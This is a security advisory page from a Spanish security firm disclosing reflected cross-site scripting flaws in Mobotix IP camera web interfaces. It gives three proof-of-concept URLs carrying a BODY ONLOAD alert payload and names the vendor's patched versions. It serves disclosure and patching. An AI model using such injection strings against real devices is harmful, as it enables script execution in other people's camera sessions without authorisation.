Eazel - Mobotix IP Network Cameras Multiple XSS

La Idea

I+D+i

Servicios

Productos

Security Advisory

Presentaciones

Links

Contactar

Mobotix IP Network Cameras Multiple XSS
Version:	Tested on M1 and M10 - M10-V2.0.5.2 - M1-V1.9.4.7
Discovered by:	Discovered by: jaime.blasco(at)eazel(dot).es http://www.eazel.es
Description:	Mobotix is vulnerable to multiple security vulnerabilites that allow cross site scripting flaws. Due to improper filtering a remote attacker can cause a cross site scripting in these scripts: http://camera/help/help?%3CBODY%20ONLOAD=alert('www.eazel.es')%3E http://camera/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E&download=egal http://camera/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E
Vendor:	MOBOTIX provides new software versions that include a security patch that prevents cross site scripting flaws. MOBOTIX encourages customers to upgrade to at least software version - V2.2.3.18 (for camera models M10/D10) and - V3.0.3.31 (for camera model M22) or higher (if available). The software is available for download from our website www. mobotix .com : http://www. mobotix .com/service s/software_downloads

Conozca la situación real de la seguridad de su empresa.

TEST DE INTRUSIÓN

Someta a sus aplicaciones a los más exigentes test de seguridad.

AUDITORÍA DE CÓDIGO

Aprenda a proteger sus sistemas y aplicaciones informáticas.

FORMACIÓN

Test de intrusion - auditoria de sistemas - Seguridad Redes Inalámbricas - Revisión de Seguridad de Red - Seguridad Redes VoIP - Seguridad Sistemas SAP - Filtro web - drainware - Seguridad sistemas Oracle - Analisis forense - Seguridad Aplicaciones Móviles
© Todos los derechos reservados HAZENT SYSTEMS S.L. 2009 cif B-84394683 • Tlf. +34 902 056 483 • +34 91 120 18 12